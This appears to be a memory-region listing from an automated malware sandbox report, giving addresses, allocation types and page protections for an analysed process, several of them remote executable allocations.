|
||
|
22B0000
|
unkown
|
page read and write
|
||
|
69E000
|
heap
|
page read and write
|
||
|
5EE000
|
unkown
|
page execute read
|
||
|
48C0000
|
heap
|
page read and write
|
||
|
48DD000
|
heap
|
page read and write
|
||
|
8B79000
|
heap
|
page read and write
|
||
|
A40000
|
unkown
|
page read and write
|
||
|
8C24000
|
heap
|
page read and write
|
||
|
3390000
|
heap
|
page readonly
|
||
|
266D000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
611000
|
heap
|
page read and write
|
||
|
1FB80000
|
direct allocation
|
page read and write
|
||
|
266E000
|
stack
|
page read and write
|
||
|
7804000
|
heap
|
page read and write
|
||
|
23EA000
|
unkown
|
page read and write
|
||
|
2468000
|
heap
|
page read and write
|
||
|
7A6000
|
unkown
|
page read and write
|
||
|
7B3000
|
unkown
|
page read and write
|
||
|
7410000
|
heap
|
page read and write
|
||
|
23F2000
|
unkown
|
page read and write
|
||
|
296F000
|
stack
|
page read and write
|
||
|
32B4000
|
trusted library allocation
|
page read and write
|
||
|
611000
|
heap
|
page read and write
|
||
|
48D2000
|
heap
|
page read and write
|
||
|
8FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23A5000
|
unkown
|
page read and write
|
||
|
23E4000
|
unkown
|
page read and write
|
||
|
20871000
|
heap
|
page read and write
|
||
|
7029D000
|
unkown
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
8CF000
|
heap
|
page read and write
|
||
|
2049E000
|
stack
|
page read and write
|
||
|
3AA6000
|
unkown
|
page read and write
|
||
|
1FB50000
|
direct allocation
|
page read and write
|
||
|
46C0000
|
unkown
|
page execute and read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
888000
|
heap
|
page read and write
|
||
|
3090000
|
heap
|
page read and write
|
||
|
242C000
|
unkown
|
page read and write
|
||
|
23BA000
|
unkown
|
page read and write
|
||
|
2035D000
|
stack
|
page read and write
|
||
|
1FB10000
|
direct allocation
|
page read and write
|
||
|
3280000
|
trusted library section
|
page read and write
|
||
|
5120000
|
trusted library allocation
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
8ECC000
|
stack
|
page read and write
|
||
|
149000
|
stack
|
page read and write
|
||
|
245E000
|
unkown
|
page read and write
|
||
|
239C000
|
unkown
|
page read and write
|
||
|
919D000
|
direct allocation
|
page execute and read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
2407000
|
unkown
|
page read and write
|
||
|
23FE000
|
unkown
|
page read and write
|
||
|
5F0000
|
unkown
|
page execute read
|
||
|
2422000
|
unkown
|
page read and write
|
||
|
7D00000
|
trusted library allocation
|
page read and write
|
||
|
8C4000
|
heap
|
page read and write
|
||
|
334E000
|
stack
|
page read and write
|
||
|
23A1000
|
unkown
|
page read and write
|
||
|
5F2000
|
unkown
|
page execute read
|
||
|
401000
|
unkown
|
page execute read
|
||
|
4850000
|
direct allocation
|
page read and write
|
||
|
49DE000
|
stack
|
page read and write
|
||
|
8B3F000
|
stack
|
page read and write
|
||
|
238A000
|
unkown
|
page read and write
|
||
|
23C1000
|
unkown
|
page read and write
|
||
|
5FB000
|
heap
|
page read and write
|
||
|
3AA3000
|
unkown
|
page read and write
|
||
|
A20000
|
unkown
|
page read and write
|
||
|
7290000
|
direct allocation
|
page read and write
|
||
|
8C0000
|
unkown
|
page readonly
|
||
|
C090000
|
trusted library allocation
|
page read and write
|
||
|
7FA0000
|
trusted library allocation
|
page read and write
|
||
|
23F6000
|
unkown
|
page read and write
|
||
|
60D1000
|
trusted library allocation
|
page read and write
|
||
|
48E2000
|
heap
|
page read and write
|
||
|
2393000
|
unkown
|
page read and write
|
||
|
8BF000
|
stack
|
page read and write
|
||
|
3AA0000
|
unkown
|
page read and write
|
||
|
89E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F6E000
|
stack
|
page read and write
|
||
|
4940000
|
heap
|
page read and write
|
||
|
237E000
|
unkown
|
page read and write
|
||
|
23C4000
|
unkown
|
page read and write
|
||
|
77C000
|
unkown
|
page read and write
|
||
|
71C0000
|
direct allocation
|
page read and write
|
||
|
48E2000
|
heap
|
page read and write
|
||
|
2470000
|
unkown
|
page read and write
|
||
|
276F000
|
stack
|
page read and write
|
||
|
4939000
|
heap
|
page read and write
|
||
|
48A7000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
1FF2E000
|
stack
|
page read and write
|
||
|
180D000
|
remote allocation
|
page execute and read and write
|
||
|
48DD000
|
heap
|
page read and write
|
||
|
70296000
|
unkown
|
page readonly
|
||
|
2354000
|
heap
|
page read and write
|
||
|
8B2000
|
heap
|
page read and write
|
||
|
32E5000
|
trusted library allocation
|
page execute and read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
7AA000
|
unkown
|
page read and write
|
||
|
2449000
|
unkown
|
page read and write
|
||
|
4892000
|
heap
|
page read and write
|
||
|
23BD000
|
unkown
|
page read and write
|
||
|
8C49000
|
heap
|
page read and write
|
||
|
3AA0000
|
unkown
|
page read and write
|
||
|
492E000
|
heap
|
page read and write
|
||
|
48DE000
|
heap
|
page read and write
|
||
|
239E000
|
unkown
|
page read and write
|
||
|
220D000
|
remote allocation
|
page execute and read and write
|
||
|
2BCD000
|
stack
|
page read and write
|
||
|
2403000
|
unkown
|
page read and write
|
||
|
C9F000
|
stack
|
page read and write
|
||
|
1FF6F000
|
stack
|
page read and write
|
||
|
666000
|
heap
|
page read and write
|
||
|
239E000
|
unkown
|
page read and write
|
||
|
7F10000
|
heap
|
page read and write
|
||
|
60000
|
direct allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
6A6000
|
heap
|
page read and write
|
||
|
60C1000
|
trusted library allocation
|
page read and write
|
||
|
48D2000
|
heap
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
4FFE000
|
stack
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
3AA3000
|
unkown
|
page read and write
|
||
|
4754000
|
heap
|
page read and write
|
||
|
26AE000
|
stack
|
page read and write
|
||
|
20875000
|
heap
|
page read and write
|
||
|
580000
|
unkown
|
page readonly
|
||
|
89F0000
|
trusted library allocation
|
page read and write
|
||
|
7BF000
|
stack
|
page read and write
|
||
|
33D7000
|
heap
|
page read and write
|
||
|
4F2C000
|
stack
|
page read and write
|
||
|
20BBC000
|
direct allocation
|
page execute and read and write
|
||
|
79CF000
|
stack
|
page read and write
|
||
|
2449000
|
unkown
|
page read and write
|
||
|
6B0000
|
unkown
|
page readonly
|
||
|
3407000
|
heap
|
page read and write
|
||
|
2458000
|
unkown
|
page read and write
|
||
|
2396000
|
unkown
|
page read and write
|
||
|
71E0000
|
direct allocation
|
page read and write
|
||
|
23AF000
|
unkown
|
page read and write
|
||
|
20748000
|
heap
|
page read and write
|
||
|
180000
|
unkown
|
page read and write
|
||
|
8A40000
|
trusted library allocation
|
page read and write
|
||
|
325B000
|
heap
|
page read and write
|
||
|
AF0000
|
unkown
|
page readonly
|
||
|
2012F000
|
stack
|
page read and write
|
||
|
492E000
|
heap
|
page read and write
|
||
|
6D7F000
|
unkown
|
page execute and read and write
|
||
|
492E000
|
heap
|
page read and write
|
||
|
8B6000
|
heap
|
page read and write
|
||
|
32BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FB90000
|
direct allocation
|
page read and write
|
||
|
8FC0000
|
trusted library allocation
|
page read and write
|
||
|
338E000
|
stack
|
page read and write
|
||
|
2363000
|
heap
|
page read and write
|
||
|
320F000
|
heap
|
page read and write
|
||
|
507E000
|
stack
|
page read and write
|
||
|
7A4D000
|
stack
|
page read and write
|
||
|
1660000
|
remote allocation
|
page execute and read and write
|
||
|
4860000
|
heap
|
page read and write
|
||
|
7FB0000
|
trusted library allocation
|
page read and write
|
||
|
E80000
|
unkown
|
page readonly
|
||
|
7BF000
|
stack
|
page read and write
|
||
|
8C41000
|
heap
|
page read and write
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
B0000
|
direct allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
CA0000
|
heap
|
page read and write
|
||
|
1E5000
|
heap
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
4890000
|
heap
|
page read and write
|
||
|
2409000
|
unkown
|
page read and write
|
||
|
3BA0000
|
unkown
|
page read and write
|
||
|
48E2000
|
heap
|
page read and write
|
||
|
805000
|
unkown
|
page readonly
|
||
|
71F0000
|
direct allocation
|
page read and write
|
||
|
31B9000
|
heap
|
page read and write
|
||
|
33D0000
|
heap
|
page read and write
|
||
|
2413000
|
unkown
|
page read and write
|
||
|
2440000
|
unkown
|
page read and write
|
||
|
2B6F000
|
stack
|
page read and write
|
||
|
31B0000
|
unkown
|
page readonly
|
||
|
4A20000
|
heap
|
page read and write
|
||
|
23CD000
|
unkown
|
page read and write
|
||
|
2460000
|
heap
|
page read and write
|
||
|
23A5000
|
unkown
|
page read and write
|
||
|
8FA0000
|
trusted library allocation
|
page read and write
|
||
|
5217000
|
trusted library allocation
|
page read and write
|
||
|
22D0000
|
unkown
|
page readonly
|
||
|
7A4000
|
unkown
|
page read and write
|
||
|
4939000
|
heap
|
page read and write
|
||
|
23A1000
|
unkown
|
page read and write
|
||
|
120000
|
direct allocation
|
page execute and read and write
|
||
|
8C73000
|
heap
|
page read and write
|
||
|
21640000
|
unclassified section
|
page execute and read and write
|
||
|
499E000
|
stack
|
page read and write
|
||
|
48E2000
|
heap
|
page read and write
|
||
|
7029F000
|
unkown
|
page readonly
|
||
|
35A0000
|
heap
|
page read and write
|
||
|
23FB000
|
unkown
|
page read and write
|
||
|
C0C9000
|
trusted library allocation
|
page read and write
|
||
|
560000
|
unkown
|
page read and write
|
||
|
7C5000
|
unkown
|
page readonly
|
||
|
2C0D000
|
remote allocation
|
page execute and read and write
|
||
|
23BF000
|
unkown
|
page read and write
|
||
|
1FB60000
|
direct allocation
|
page read and write
|
||
|
339F000
|
stack
|
page read and write
|
There are 613 hidden memdumps, click here to show them.